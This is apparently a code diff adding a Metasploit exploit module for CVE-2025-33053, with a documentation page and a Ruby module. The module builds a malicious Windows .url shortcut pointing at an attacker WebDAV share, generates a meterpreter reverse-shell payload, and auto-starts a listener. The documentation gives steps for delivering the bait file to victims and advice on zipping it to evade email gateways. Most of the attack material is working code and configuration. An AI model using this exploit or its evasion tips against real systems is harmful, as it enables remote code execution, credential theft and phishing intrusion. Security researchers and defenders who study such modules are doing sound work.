Add some features for CVE-2025-33053 exploit module

Author: DevBuiHieu

documentation/modules/exploit/windows/fileformat/cve_2025_33053.md

@@ -0,0 +1,149 @@
+## Vulnerable Application
+
+CVE-2025-33053 - Internet Shortcut (.url) UNC Path Exploit
+
+Windows improperly handles `.url` (Internet Shortcut) files referencing remote
+UNC paths.
+Specifically, `.url` files that specify a remote working directory
+(`WorkingDirectory=\\attacker\webdav`) and a trusted executable (e.g.,
+`iediagcmd.exe`)
+may cause the system to access the attacker's server when opened.
+
+This behavior can be exploited to:
+
+- Trigger NTLM authentication leaks (SMB relay)
+- Load remote payloads via WebDAV shares
+- Attempt DLL sideloading if conditions allow
+
+## Affected Versions
+
+- Windows 10 22H2
+- Windows 11 23H2
+- Fully patched prior to June 2025 Patch Tuesday
+
+## Verification Steps
+
+1. Let the module setup WebDAV or do it manually
+2. Use the module to generate a `.url` file
+3. Deliver the `.url` to the target (email, USB, zip)
+4. On victim machine, open `.url`
+5. Observe connection back to WebDAV server
+
+## Overview
+
+This module generates a malicious `.url` Internet Shortcut file that abuses
+CVE-2025-33053 —
+a vulnerability in how Windows handles `.url` files referencing remote UNC
+paths.
+
+When opened on a vulnerable system, the `.url` causes the system to connect to a
+UNC path
+(e.g., a WebDAV share), triggering an attempt to execute a trusted binary
+from the attacker's location. This can result in RCE or credential leaks.
+
+It supports:
+
+- Auto-generating a reverse shell payload
+- Hosting the payload in a WebDAV share
+- Launching a Metasploit handler
+
+## Module Information
+
+**Module Name**: exploits/windows/fileformat/cve_2025_33053
+**Authors**:
+
+- Dev Bui Hieu
+
+**Disclosure Date**: 2025-06-11
+**License**: MSF_LICENSE
+**Rank**: Normal
+
+## Options
+
+### GEN_PAYLOAD
+
+Whether to generate payload and move to WebDAV directory (default: true)
+
+### START_LISTENER
+
+Whether to auto-start a Metasploit multi/handler (default: true)
+
+### WEBDAV_DIR
+
+WebDAV folder for payload and .url (default: /var/www/webdav)
+
+### OUTFILE
+
+Output .url filename (default: bait.url)
+
+### LOLBAS_EXE
+
+Path to a trusted executable to launch (default: iediagcmd.exe)
+
+### ICON_PATH
+
+Icon used for the shortcut (default: msedge.exe)
+
+### ICON_INDEX
+
+Index of the icon in the icon file (default: 13)
+
+### MODIFIED_HEX
+
+Modified timestamp value for the .url file (default: 20F06BA06D07BD014D)
+
+## Scenarios
+
+You can use this module in:
+
+- Phishing simulations
+- Red team operations
+- Awareness training
+- DLL sideloading test
+- Drive-by UNC path abuse
+
+## Example Usage
+
+```console
+use exploits/windows/fileformat/cve_2025_33053
+set LHOST 192.168.1.10
+run
+```console
+
+Optional:
+
+```console
+set WEBDAV_DIR /var/www/webdav
+set OUTFILE clickme.url
+set PAYLOAD windows/x64/meterpreter/reverse_http
+set START_LISTENER true
+run
+```console
+
+## Output
+
+Example .url file:
+
+```console
+[InternetShortcut]
+URL=C:\Program Files\Internet Explorer\iediagcmd.exe
+WorkingDirectory=\\192.168.1.10\webdav\
+ShowCommand=7
+IconIndex=13
+IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
+Modified=20F06BA06D07BD014D
+```console
+
+## References
+
+- [GitHub PoC](https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept)
+- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-33053)
+- [LOLBAS Project](https://lolbas-project.github.io)
+- [Microsoft Advisory](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053)
+
+## Notes
+
+- Payload hosted via WebDAV must be reachable from the victim
+- On patched systems, SmartScreen or Defender may block the connection
+- Zip `.url` to evade email gateway protections
+- Listener starts automatically if `START_LISTENER` is true

modules/exploits/windows/fileformat/cve_2025_33053.rb

@@ -0,0 +1,93 @@
+require 'msf/core'
+require 'fileutils'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'CVE-2025-33053 Exploit via Malicious .URL File and WebDAV',
+      'Description'    => %q{
+        This module creates a malicious .URL file that abuses CVE-2025-33053,
+        optionally sets up a WebDAV server, generates a payload, places it into
+        the WebDAV directory, and can launch a listener automatically.
+      },
+      'Author'         => ['Dev Bui Hieu'],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => '2025-06-11',
+      'References'     => [
+        ['CVE', '2025-33053'],
+        ['URL', 'https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept']
+      ]
+    ))
+
+    register_options(
+      [
+        OptString.new('LHOST', [true, 'Local host for reverse connection']),
+        OptInt.new('LPORT', [true, 'Local port for reverse connection', 4444]),
+        OptString.new('PAYLOAD', [true, 'Payload to generate', 'windows/x64/meterpreter/reverse_tcp']),
+        OptBool.new('GEN_PAYLOAD', [true, 'Generate payload and move to WebDAV directory', true]),
+        OptBool.new('START_LISTENER', [true, 'Start handler after setup', true]),
+        OptString.new('WEBDAV_DIR', [true, 'WebDAV directory path', '/var/www/webdav']),
+        OptString.new('OUTFILE', [true, 'Output URL file name', 'bait.url']),
+        OptString.new('LOLBAS_EXE', [true, 'Path to trusted binary (LOLBAS)', 'C:\\Program Files\\Internet Explorer\\iediagcmd.exe']),
+        OptString.new('ICON_PATH', [true, 'Icon file path', 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe']),
+        OptInt.new('ICON_INDEX', [true, 'Icon index in icon file', 13]),
+        OptString.new('MODIFIED_HEX', [true, 'Modified timestamp in hex', '20F06BA06D07BD014D'])
+      ]
+    )
+  end
+
+  def run
+    lhost = datastore['LHOST']
+    lport = datastore['LPORT']
+    payload_type = datastore['PAYLOAD']
+    webdav_dir = datastore['WEBDAV_DIR']
+    gen_payload = datastore['GEN_PAYLOAD']
+    start_listener = datastore['START_LISTENER']
+
+    print_status("Creating WebDAV directory if not exists...")
+    FileUtils.mkdir_p(webdav_dir) unless File.directory?(webdav_dir)
+
+    if gen_payload
+      exe_path = File.join(webdav_dir, 'payload.exe')
+      print_good("Generating payload at: #{exe_path}")
+      generate_payload_exe(payload_type, lhost, lport, exe_path)
+    end
+
+    unc_path = "\\\\#{lhost}\\#{File.basename(webdav_dir)}\\"
+    url_content = <<~EOF
+      [InternetShortcut]
+      URL=#{datastore['LOLBAS_EXE']}
+      WorkingDirectory=#{unc_path}
+      ShowCommand=7
+      IconIndex=#{datastore['ICON_INDEX']}
+      IconFile=#{datastore['ICON_PATH']}
+      Modified=#{datastore['MODIFIED_HEX']}
+    EOF
+
+    url_file = File.join(Msf::Config.local_directory, datastore['OUTFILE'])
+    File.write(url_file, url_content)
+    print_good(".URL file written to: #{url_file}")
+
+    if start_listener
+      print_status("Starting handler as background job...")
+      handler = framework.exploits.create('multi/handler')
+      handler.datastore['PAYLOAD'] = payload_type
+      handler.datastore['LHOST'] = lhost
+      handler.datastore['LPORT'] = lport
+      handler.exploit_simple('RunAsJob' => true)
+    end
+
+    print_status("Module complete. Deliver #{url_file} to victim.")
+  end
+
+  def generate_payload_exe(payload, lhost, lport, output_path)
+    exe = framework.payloads.create(payload)
+    exe.datastore['LHOST'] = lhost
+    exe.datastore['LPORT'] = lport
+    raw = exe.generate
+    exe_file = Rex::Text.to_win32pe(raw, exe.arch)
+    File.open(output_path, 'wb') { |f| f.write(exe_file) }
+  end
+end